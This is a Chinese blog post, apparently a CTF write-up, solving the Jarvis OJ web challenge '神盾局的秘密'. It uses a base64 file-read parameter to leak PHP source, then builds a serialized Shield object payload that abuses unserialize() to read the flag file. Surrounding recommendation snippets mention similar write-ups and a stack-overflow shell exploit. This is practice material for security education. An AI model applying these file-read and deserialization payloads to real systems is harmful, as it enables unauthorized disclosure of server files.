Jarvis OJ web部分_神盾局的秘密

最新推荐文章于 2021-09-13 10:37:50 发布
最新推荐文章于 2021-09-13 10:37:50 发布
阅读量490 收藏
点赞数
分类专栏: ctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/silence1_/article/details/96456622
版权

Jarvis OJ web部分_神盾局的秘密

题目链接:http://web.jarvisoj.com:32768/

打开题目,F12,发现一个图片链接,showimg.php?img=c2hpZWxkLmpwZw==
于是去到这个页面,发现并不是一张图片,而是图片的文档打开形式。又注意到img=c2hpZWxkLmpwZw==这个应该是base64编码后的字符串,解码后为shield.jpg
猜测img接收的文件会被解析为php代码执行。


于是试试传index.php进去。将其base64编码后为:aW5kZXgucGhw,传入后在源码中发现
在这里插入图片描述
代码为:

<?php 
	require_once('shield.php');
	$x = new Shield();
	isset($_GET['class']) && $g = $_GET['class'];
	if (!empty($g)) {
		$x = unserialize($g);
	}
	echo $x->readfile();
?>

发现其包含了shield.php,于是尝试用相同的方法获得shield.php的信息。
在这里插入图片描述
shield.php的源码为:

<?php
	//flag is in pctf.php
	class Shield {
		public $file;
		function __construct($filename = '') {
			$this ->file = $filename;
		}
	
	function readfile() {
			if (!empty($this->file) && stripos($this->file,'..')===FALSE  
			&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
				return @file_get_contents($this->file);
			}
		}
	}
?>

这里还给出了我们想要的flag在pctf.php中。并且过滤了/和\\,也就不能直接目录遍历了。

接下来是分析代码。

index.php中将GET的数据进行反序列化,然后直接包含类中的文件。
而shield.php就是类的定义。

这里可以用这个网站进行在线序列化。
在这里插入图片描述
将包含文件为pctf.php的类序列化后的字符串为:O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}


之后直接在index.php中提交该字串就可以了。
最后,payload为:http://web.jarvisoj.com:32768/index.php?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
提交后,flag在注释中。
在这里插入图片描述

Dar1in9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
Jarvis-神盾秘密
wyj_1216 House
10-06 1197
神盾秘密 时间:2018年10月5日 回报人:王祎洁 题目 http://web.jarvisoj.com:32768/ 题解 打开网页,发现一张图片,查看页面源代码,发现图片是从showing.php中读取的,且img=base64编码 并将其读入 发现是图片编码 尝试读取已知showing.php文件 尝试读取index.php文件 查看页面源代码后,发现shi...
jarvis oj 神盾秘密 wp
欢迎来到神林的博客
09-12 373
jarvis oj 中的反序列化 收集信息: 发现是张图片,如果没有表明是个misc题目的话,这张图片显然是base64文件流读出来的,新标签看一下:         显然,这是个bsae64文件读出来的,上面 "img ="给我我们提示,显然是个任意文件读,那么我们把它所有必要文件都读出来: index.php shield.php ...
PCTF 神盾秘密
偷一个月亮
09-02 491
http://web.jarvisoj.com:32768/ 文件包含读源码 index.php <?php require_once('shield.php'); $x = new Shield(); isset($_GET['class']) && $g = $_GET['class']; if (!empty($g)) { $x = unserialize(...
浙大CTF web-神盾秘密
weixin_46578840的博客
09-13 389
打开题目地址,看到一张图片f12看到img后跟了一串base 解码得到shield.jpg,将后缀改为php编码成base访问得到一串代码 得到flag所在的pctf.php,直接访问出错,看到url里的showimg.php文件,想到将其编码base64,看一下源代码,发现img参数可以任意查看文件 上面提示的shield,已经看过了,这时候想到phpo的web一般都会有index.php,编码base64访问一下 看到包含了shield.php文件,那思路就来了,可以用index文件class传参p
Jarvis OJ 神盾秘密
沐目的博客
04-19 605
Jarvis OJ 神盾秘密 首先打开网页后,发现一张图片,下载下来看了一下,没有什么发现。让后回到刚才的网页,打开控制器,发现图片是以文件包含的形式传过来的,所以就可以联想,它既然可以包含图片,那应该也就可以包含文件。于是我们需要在url里面试,我们目前就只知道有一个叫showimg.php的文件,所以我们就从它开始试。base64转码后,提交到url, 让后成功访问了,打开页面原代码,看见...
神盾秘密
筱阳的博客
12-21 322
题目地址 :http://web.jarvisoj.com:32768/       一般套路,先看HTTP头,源码   通过扫网站发现存在index.pnp 访问也没有什么东西 尝试:http://web.jarvisoj.com:32768/showimg.php?img=index.php    将index.php进行base64试试: view-source:htt...
showimg.php,CTF-WEB-神盾秘密 #class#源文件读取#unserialize
weixin_33315077的博客
03-21 450
神盾秘密—— PCTF{W3lcome_To_Shi3ld_secret_Ar3a}描述这里有个通向神盾内部网络的秘密入口,你能通过漏洞发现神盾秘密吗?http://web.jarvisoj.com:32768/分析抓包发现: showimg.php?img=c2hpZWxkLmpwZw==,c2hpZWxkLmpwZw==为base64后的shield.jpg。判断考点为读取源代码,试...
jarvis http
发蝴蝶和大脑斧的博客
03-19 721
结构有点复杂。 学习了用ida调试remote linux: 1.linux运行linux_server64 2.ida
JarvisOJ.docx
03-10
JarvisOJ
jarvis_data_eng_AnthonyInthavong
03-31
通过Jarvis,我使用Java 1.8,Maven,Linux / Bash,Git,Docker和RDBMS从事了许多独特的项目。 我非常渴望与Jarvis的客户会面,不仅向他们学习,而且还展示了我的技能。 技能专长 精通: Java,Python,机器学习和...
matlab说话代码-jarvis_data_eng_akshay:jarvis_data_eng_akshay
05-22
Sapra-Jarvis Consulting 我最近从UBC毕业,并以优异的成绩获得了机械工程学位。 在过去的几年中,随着我的兴趣从机械工程转向计算机,我在整个大学里都自学了计算机科学的概念。 我已经完成了多个项目,这些项目使...
php 反序列注入,php反序列化漏洞(对象注入)
weixin_29585583的博客
04-07 271
前言:一直对序列化和反序列化迷迷糊糊,决心立flag要copy思考一波.概念:什么是反序列化漏洞?为了理解反序列化,我需要理解什么是序列化。这里我尝试用一个demo来帮助自己理解:Student类在实例化并传入变量值后形成student1对象。在其他场景下可能会用到该实例,但如果一直保留不销毁等待下次调用的话,会造成浪费系统资源。这时候,可以将对象序列化,成为一个字符串,当使用时候再反序列化出来。...
CTF小练习-摩尔斯密码
qq_38758407的博客
09-28 2870
看到文件后感觉是音频隐写用MP3Steno后结果什么也没有得到。。。。 然后百度音频隐写看到这样一条writeup 然后确定应该就是听电报。 下载工具Audacity 后来发现那个ctftools网站上下的集合包中其实有这个工具 打开后看到这个还是很懵逼 百度摩尔斯密码研究之后发现了规律 200宽度的表示— 50宽度的表示  . 距离50宽度的连读,50宽
PHP代码审计之函数漏洞(上)
JBlock的博客
03-13 5430
前言 此篇文件属于代码审计篇的一个环节,其意图是为总结php常见函数漏洞分为上下两节,此为上节!此篇与命令注入绕过篇和sql注入回顾篇同属一个系列!欢迎各位斧正! 文章目录前言正文intval()使用不当导致安全漏洞的分析switch()in_array()PHP弱类型的特性&quot;.&quot;被替换成&quot;_&quot;unsetserialize 和 unserialize漏洞session 反序列化漏洞MD5 comp...
【搬运于原博客】JarvisOj平台做题总结(1)
qq_38352420的博客
06-30 219
title: JarvisOj平台做题总结(1) date: 2018-07-21 19:37:11 [JarvisOj]神盾秘密 IN A Mess [JarvisOj]神盾秘密 题目链接:http://web.jarvisoj.com:32768/ 考察代码审计和文件包含漏洞= = http://web.jarvisoj.com:32768/查看源代码 点击进入之后一看长成这样还以为是data伪协议对图片进行base64编码,传了半天事实证明我又想多了= = [外链图片转存失败,源站可.
Jarvis-OJ WEB 多题writeup
烟敛寒林的博客
04-19 4005
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格S...
XCTF攻防世界web新手练习_ 7_weak_auth
热门推荐
silence1_的博客
04-28 2万+
XCTF攻防世界web新手练习—weak_auth 题目 题目为weak_auth,描述信息,重点:随手就设了一个密码 进入题目,看到需要登录,随便输入一个用户名和密码试试 弹出弹窗提示用admin账户登录 于是用确定用户名为admin F12看看源码,提示需要一个字典,意思是要进行爆破 于是用burp进行爆破,当密码为123456时返回长度不同 查看此时返回响应得到flag! 关于弱...
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值